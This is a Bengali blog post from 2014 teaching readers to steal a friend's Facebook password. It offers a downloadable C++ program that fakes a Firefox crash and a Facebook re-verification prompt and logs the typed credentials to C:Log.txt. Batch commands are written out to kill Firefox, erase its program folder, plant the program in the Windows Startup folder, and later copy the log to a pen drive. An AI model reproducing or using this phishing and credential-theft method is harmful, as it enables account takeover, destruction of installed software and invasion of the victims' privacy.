Sunday, 20 July 2014

জটিলভাবে বোকা বানিয়ে হ্যাক করুন বন্ধুর FaceBook একাউন্ট!!!

হ্যাকিং শিখতে খুব আগ্রহী এমন মানুষের কোন অভাব নেই। বিশেষ করে, কারো যদি FaceBook একাউন্ট হ্যাক করতে পারতেন, তাহলে হয়ত আপনার জীবন সার্থক হত। কিন্তু আমরা সকলেই জানি, হ্যাকিং কোন সহজ বিষয় নয়। শিখতে অনেক কষ্ট হয়।

আমি কোন এক্সপার্ট হ্যাকার না হলেও আজ আপনাদের একটা হ্যাকিং শিখাব। আশা করি শিরোনাম দেখেই আপনি বুঝতে পারছেন আমি কিসের হ্যাকিং এর কথা বলছি। আমি যে পদ্ধতি বলব, তা খুবই সহজ। এমনকি শ্রেষ্ঠ এন্টিভাইরাস ও আমার এই কারসাজি ধরতে পারবে না। তবে শর্ত একটাই, আপনার ভিকটিমের কম্পিউটারে আপনার এক্সেস থাকতে হবে। আপনার বন্ধু কি তার কম্পিউটারে আপনাকে হাত দিতে দিবে না, তা হয় নাকি? অনেকেই তো আছেন বন্ধুর কম্পিউটারে ঘন্টার পর ঘন্টা বসে থাকেন।

এখন চলে আসি  মূল কথায়। আমি C++ দিয়ে স্বহস্তে একটি প্রোগ্রাম বানিয়েছি যা মানুষকে বোকা বানাতে সক্ষম, হ্যাঁ, নিজে তৈরি করেছি। আবার বলিয়েন না যে অন্য জায়গা থেকে কপি-পেস্ট মারছি। এমন উলটাপালটা বুদ্ধি আমার মাথা ছাড়া কারো মাথায় আসে না। C++ জানা থাকলে ভাল। তবে সমস্যা নেই, কারন আমি কোডটা + ফাইলটা দিয়ে দিব। যেটা খুশি ব্যবহার করিয়েন।

যেভাবে কাজ করবেঃ

আগে বলে রাখি, জিনিসটা খুবই সিম্পল। আপনার বন্ধু যখন কম্পিউটার রান করবে, তখন প্রথমে একটা মেসেজ দেখাবে “Serious Error Occured”. তারপর একটা কনসোল দেখাবে, যেখানে লেখা থাকবে – “FireFox has crashed on the last start for one or more reason. Some scripts may fail to protect your login credentials from 3rd Parties. To help protect your login id, please verify again. The following verification codes are valunerable: FaceBook.
Please re-verify your FaceBook account. This is for your own safety.”
এরপর Username এবং Pass চাওয়া হবে। আপনার বন্ধু যদি এই কনসোলের কথা বিশ্বাস করে, তাহলেই কেল্লা ফতে। সে লেখার সময় একেবারে Login Pass লেখার মত অনুভব করবে। সে রকম কারসাজিই আমি করেছি।
আর তারপর, তারপর কি???????
তারপর তার UserName এবং Pass একটা ফাইলে সেভ হয়ে যাবে। আপনার কাজ হচ্ছে পরের দিন এসে ফাইলটি নিয়ে নেয়া। মজার না? icon smile জটিলভাবে বোকা বানিয়ে হ্যাক করুন বন্ধুর FaceBook একাউন্ট!!!
নিচে কনসোলটি স্ক্রিনশট:

119 জটিলভাবে বোকা বানিয়ে হ্যাক করুন বন্ধুর FaceBook একাউন্ট!!!

যেভাবে করবেনঃ
এজন্য C++ লাগবে। তবে না জানলে সমস্যা নেই, কারন আমি ফাইলটি দিয়ে দেব। কোডটি চলুন দেখে নিই: http://codetidy.com/2300

ফাইলটি ডাউনলোড করতেঃ http://www.mediafire.com/?0y734mbykpixa97

এখন জেনে নিই কীভাবে কাজটি করবেন।
প্রথমে একটা ব্যাচ ফাইল বানান, যেখানে নিম্নলিখিত কোডগুলো লিখবেন:
taskkill /f /im firefox.exe
erase /f /q “C:Program FilesMozilla FireFox*.*”
copy “crash.exe” “C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup”
exit

আপনার কাজ শেষ। এবার এই ব্যাচ ফাইল .bat এবং crash.exe ফাইলটি আপনার পেনড্রাইভে নিয়ে বন্ধুর কম্পিউটারে যান। এবার সুযোগ বুঝে ব্যাচ ফাইলটি রান করুন। এর ফলে crash.exe আপনার বন্ধুর কম্পিউটারের Startup এ চলে যাবে। পরবর্তীত কম্পিউটার রান করলেই সে কনসোল দেখতে পাবে। সে যখন ফায়ারফক্স রান করবে, তখন ফায়ারফক্স কাজ করবে না। এর ফলে সে ভাববে সত্যিই কিছু হয়েছে এবং সে পাস ও লগিন আইডি দিয়ে দিবে।
এই পাস ও লগিন আইডি C:Log.txt নামক ফাইলে সেভ হবে। আপনার কাজ হবে পরেরদিন এসে সুযোগ বুঝে Log.txt ফাইলটি নিয়ে নেয়া। জিনিসটা সহজ করতে একটা ব্যাচ ফাইল তৈরি করতে পারেনঃ
copy “C:Log.txt” “J:”
erase /f /q “C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupcrash.exe”

উপরের কোডে J: এর জায়গায় আপনার পেনড্রাইভ ড্রাইভার লেটার বসিয়ে দিন। বিশেষ করে আপনার বন্ধুর কম্পিউটারে পেনড্রাইভ ঢুকালে কোন ড্রাইভার লেটার শো করে তা বসাবেন। চলুন দেখে নিই Log.txt ফাইলটি।
210 জটিলভাবে বোকা বানিয়ে হ্যাক করুন বন্ধুর FaceBook একাউন্ট!!!

দেখলেন তো, উক্ত ফাইলে এভাবেই আপনার বন্ধুর login id সেভ হয়ে থাকবে।


কেমন লাগল? বুদ্ধিটা একটু উলটা হলেও ভাল। তবে হ্যাঁ, সিকিউরিটিতে এক্সপার্ট এমন কারো কাছে এই কাজ করার চেষ্টা কইরেন না, তাহলে ধরা খাবেন। আর হ্যাঁ, ব্যাচ কমান্ড গুলো কিন্তু শুধু Windows 7 এর ক্ষেত্রে প্রযোজ্য। XP হলে Directory একটু ভিন্ন, প্রয়োজন অনুযায়ী চেঞ্জ করে নিবেন।

No comments:

Post a Comment